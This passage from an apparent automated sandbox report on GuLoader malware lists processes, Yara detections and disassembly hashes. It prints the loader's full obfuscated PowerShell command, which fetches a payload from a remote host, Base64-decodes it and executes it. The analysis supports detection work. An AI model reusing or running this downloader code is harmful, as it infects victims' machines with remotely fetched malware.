');Fritidsklubberne $Pylorous69;"
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:09:20:12
                                          Start date:24/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;"
                                          Imagebase:0x8f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:14
                                          Start time:09:20:12
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFAACE2026A Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1473210109.00007FFAACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACE20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaace20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-1452363761
                                            • Opcode ID: ab0b7ec230dc562b2849aa4b941ecd4626622a7241fbec0496908d6e6e97c62f
                                            • Instruction ID: 3700289aa731997f90a69cfd3521f67d2c8e9d2ae7f4456e5beed8fc2176103d
                                            • Opcode Fuzzy Hash: ab0b7ec230dc562b2849aa4b941ecd4626622a7241fbec0496908d6e6e97c62f
                                            • Instruction Fuzzy Hash: F202157290EBC54FEBA6976888556647FE1EF57220F0940FED08CCB1D3EA189C49C382
                                            Function 00007FFAACBAC456 Relevance: .5, Instructions: 488COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c08410c618c3463297e64c31e7e1a8bba0cc6cce49e2bee0dfc530546175738
                                            • Instruction ID: 5a336ac626aaf8550716434c7cc38ce7ef262f90a5977f2fb826633f3753bfe0
                                            • Opcode Fuzzy Hash: 1c08410c618c3463297e64c31e7e1a8bba0cc6cce49e2bee0dfc530546175738
                                            • Instruction Fuzzy Hash: ABF1A271908A4E8FEBA8DF28C8567F937D1FF55310F04826AE84DC7291DB35D9458B81
                                            Function 00007FFAACBAD202 Relevance: .5, Instructions: 467COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0671c8d14883f127f5dc0f626d7718b2ea58f22024359a8d80d185d68ed7415e
                                            • Instruction ID: d86af24a6b5f02fcc6e4d47f6ccb9b5345f4b0a3ca59b200f2435ccf346621bf
                                            • Opcode Fuzzy Hash: 0671c8d14883f127f5dc0f626d7718b2ea58f22024359a8d80d185d68ed7415e
                                            • Instruction Fuzzy Hash: 64E1C170908A4E8FEBA8DF28C8557E977D1EF55310F04826EE84DC7291DF79E9448B81
                                            Function 00007FFAACBAEAF5 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-1452363761
                                            • Opcode ID: 38120e71c6e0936ae48a5b8c9d1d13860dfe4b12fa6876e50d966f2fde90c9b0
                                            • Instruction ID: 901effd13e8a59146b3529772b1408d18e90c3cd119b7edde1e1cc914cdddb49
                                            • Opcode Fuzzy Hash: 38120e71c6e0936ae48a5b8c9d1d13860dfe4b12fa6876e50d966f2fde90c9b0
                                            • Instruction Fuzzy Hash: 5432AF70A18A598FEF88DF58C495AAD7BE1FFA9300F10416AD04DD7296CB35E845CBC0
                                            Function 00007FFAACC7189F Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1466602074.00007FFAACC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacc70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8h
                                            • API String ID: 0-2550175997
                                            • Opcode ID: 4a11123d78eb1313a3019d511a432c0d02aba4861e9f659dce2905aa6cfc07b1
                                            • Instruction ID: 21593dfc4bf70c67b1fec1de3e63f291690ee486ba6a45f583dd21dbbf37d51e
                                            • Opcode Fuzzy Hash: 4a11123d78eb1313a3019d511a432c0d02aba4861e9f659dce2905aa6cfc07b1
                                            • Instruction Fuzzy Hash: 1721E2A2D0F7D69FF391AB68585A0B46FE1DF57650B0940FAD08DCB0D3E818980A8392
                                            Function 00007FFAACC79D20 Relevance: .4, Instructions: 422COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1466602074.00007FFAACC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacc70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f411c760aa5b1d6993994ee624b6238ab6e707749ca7e2cefd877f4fc442f51b
                                            • Instruction ID: 48bfa368d2461834da37935a700f96dc0d0e09619a1782f86dca41b3c701be1f
                                            • Opcode Fuzzy Hash: f411c760aa5b1d6993994ee624b6238ab6e707749ca7e2cefd877f4fc442f51b
                                            • Instruction Fuzzy Hash: F5C1046291EB968FF79A9B2858565B57BE1EF53220F0841FED08DC71A3DD1CE8098381
                                            Function 00007FFAACC75B01 Relevance: .4, Instructions: 390COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1466602074.00007FFAACC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacc70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8738ed3bbd93bfc770afa7754a976e57fe29dfddf99d69f489ffc9cf6dd7389
                                            • Instruction ID: 03a70435cb203150c471bd8102e9b46cc90a34c87ffff92c98d63e9e61c86b65
                                            • Opcode Fuzzy Hash: e8738ed3bbd93bfc770afa7754a976e57fe29dfddf99d69f489ffc9cf6dd7389
                                            • Instruction Fuzzy Hash: 3BC11561D0EA9A8FFB55AB6888595B97BE0EF56310B1841FFD04DC70D3DA18E809C3D1
                                            Function 00007FFAACBACE16 Relevance: .3, Instructions: 344COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0abb5b28f666e26eaf4040dd7a6faefa508b28bddd2de353dcfe2683e6ff43b6
                                            • Instruction ID: ea89dacab75f3578248ec6c2939a7c13b573f348f780277e843448f08a10c810
                                            • Opcode Fuzzy Hash: 0abb5b28f666e26eaf4040dd7a6faefa508b28bddd2de353dcfe2683e6ff43b6
                                            • Instruction Fuzzy Hash: 81B1D37050CA4D8FEB68DF28D8557E93BD1EF59310F04826EE48DC7292DA35A845CBC2
                                            Function 00007FFAACC75B3B Relevance: .3, Instructions: 340COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1466602074.00007FFAACC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacc70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b39f2f538c55e29e9cb5d49fd76fa50309211e70f9496541e69cabc665134a78
                                            • Instruction ID: 5f43d29d1b29dbd7e296bda933e74edcd6c267423c32e5f490094f00b62084b4
                                            • Opcode Fuzzy Hash: b39f2f538c55e29e9cb5d49fd76fa50309211e70f9496541e69cabc665134a78
                                            • Instruction Fuzzy Hash: 2CA11561D1EA9A8FFBA5AB6888595B57BE0EF56310F1840FED44DC70D3DA18EC0883D1
                                            Function 00007FFAACE20000 Relevance: .2, Instructions: 168COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1473210109.00007FFAACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACE20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaace20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc47ad06e8f1201d55343270f942a49b5f03676cde48744e3f753be56ac11416
                                            • Instruction ID: 122ac0f781bf1bb97cbc4bb446546c594c8a3c8a3e6bdf93a2f800a567059b81
                                            • Opcode Fuzzy Hash: fc47ad06e8f1201d55343270f942a49b5f03676cde48744e3f753be56ac11416
                                            • Instruction Fuzzy Hash: A0512B72A0DB898FFBA6976884556B5BBE1EF56210B0840FBD04DD71D3EE18DC0983D1
                                            Function 00007FFAACE20040 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1473210109.00007FFAACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACE20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaace20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76c09bddb80e94d17979ebcd28710576699734b92801a6fdfa8d62d13be6e9c0
                                            • Instruction ID: 694c317bc986a8f3358d2e8b4c1af8da12ec0101027a5a3575eb8b6db40f1ab8
                                            • Opcode Fuzzy Hash: 76c09bddb80e94d17979ebcd28710576699734b92801a6fdfa8d62d13be6e9c0
                                            • Instruction Fuzzy Hash: FD41E37290EBC58FFBA69B6888556647FE0EF13210B0940FAD04DD71D3E9189C0D8391
                                            Function 00007FFAACC79E64 Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1466602074.00007FFAACC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacc70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b46afcb46dd885173eb9c018854f9999fc62796a5936c8a500343f72d8d76c7
                                            • Instruction ID: 542d38475e038f4cfe44cd319bfa7204671d4b734510bcb5cc8ae8929bf7aef2
                                            • Opcode Fuzzy Hash: 8b46afcb46dd885173eb9c018854f9999fc62796a5936c8a500343f72d8d76c7
                                            • Instruction Fuzzy Hash: CD210662E1EB968FF7A59B2C585517866E1EF93220B5880BED04DC71D3EE1CEC0982C5
                                            Function 00007FFAACBAC914 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e763678d0c0cc005f4955d5bda1ea4af4b64bbfaa19515ab1066a29674e7a24
                                            • Instruction ID: 8e3cc5da43dde515ea4c56f65dd5f37baea4ca591e361720913b71a92a9c0004
                                            • Opcode Fuzzy Hash: 0e763678d0c0cc005f4955d5bda1ea4af4b64bbfaa19515ab1066a29674e7a24
                                            • Instruction Fuzzy Hash: 7631203081966ECFFBB4DF24CC4ABF93294FF42715F404539D44E86092DA3AA949CB55
                                            Function 00007FFAACBA3945 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: 94565608c678c14942e5c711cf7fae7b80acd95db1924eb5937b4f056ccaebf3
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 9D01677111CB0D8FD744EF0CE455AA5B7E0FB99364F10056DE58AC3691DB36E881CB45

                                            Non-executed Functions

                                            Function 00007FFAACBA8AFA Relevance: 10.2, Strings: 8, Instructions: 233COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                            • API String ID: 0-3427207369
                                            • Opcode ID: 6097edd4b630070f7fe6b244580d98a1849a0a523904e70b5a7c411cb5550729
                                            • Instruction ID: 3e530a281a724c4baa3820922ca258fcb66d57f1ff70aac8bf0d88e1bfbdf925
                                            • Opcode Fuzzy Hash: 6097edd4b630070f7fe6b244580d98a1849a0a523904e70b5a7c411cb5550729
                                            • Instruction Fuzzy Hash: ED7172D2D0E7E3CBF6664359C8591A12FD0EF23B55B5982F6C0CD46883EC1B980B82C5
                                            Function 00007FFAACBA89FA Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^$M_^
                                            • API String ID: 0-2396788759
                                            • Opcode ID: 860aa84ca0af47aae88c2acdb46276856eed5866b3bffce02ebb2a614a47f987
                                            • Instruction ID: 50b730c478ee35bdf86abc01ae453c1d3a70625641e1fd821ef0bd907269b0a6
                                            • Opcode Fuzzy Hash: 860aa84ca0af47aae88c2acdb46276856eed5866b3bffce02ebb2a614a47f987
                                            • Instruction Fuzzy Hash: 604183D2D0E7D3CBF6564359C8592A06FD0EF23B5474982F6C0CC8A893FC0B980A82D6
                                            Function 00007FFAACBA8826 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^
                                            • API String ID: 0-1397233021
                                            • Opcode ID: cba83f778703b46b7c13fb5f058aa86391c752d486aeec159fa57d4df43bd0bf
                                            • Instruction ID: 3508ab3c264f1a202b317158722b3d508e96a0a60add1730c1c948ff45cb2b9b
                                            • Opcode Fuzzy Hash: cba83f778703b46b7c13fb5f058aa86391c752d486aeec159fa57d4df43bd0bf
                                            • Instruction Fuzzy Hash: 3431B392C0E7D28BF75B47A498550A13FE09F13B55B1A80F6C4DC8B493ED1BA81E83D2

                                            Executed Functions

                                            Function 03053762 Relevance: .3, Instructions: 292COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cce6a6235907796ca0109c78387f5238b78990f6f8b882fddecf50c48494a9aa
                                            • Instruction ID: 1d75d302a35165c59f6f57c0a87d3627bf29bae336cc8ff340a493445b4d8e1d
                                            • Opcode Fuzzy Hash: cce6a6235907796ca0109c78387f5238b78990f6f8b882fddecf50c48494a9aa
                                            • Instruction Fuzzy Hash: 24A1ADA690E3C25FD7078B3888657DABFB0AF17254F1A40D7D484CF1E3E6245856C7A2
                                            Function 073BD628 Relevance: 53.1, Strings: 41, Instructions: 1816COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-3915220096
                                            • Opcode ID: df1e3057d1e6d1489c48674d3e33d478dd87e9afdac2d56fc1fc2c29ead9c487
                                            • Instruction ID: bf2f6aaa533cba5b6a20d552e41d3c83db89cdcbf026ba7a8fabb24ee39848cc
                                            • Opcode Fuzzy Hash: df1e3057d1e6d1489c48674d3e33d478dd87e9afdac2d56fc1fc2c29ead9c487
                                            • Instruction Fuzzy Hash: E6D2D9B1B1020ADFFB349F69C8417EAB7A2EF85710F14846AE9099BB51CB31DD41CB91
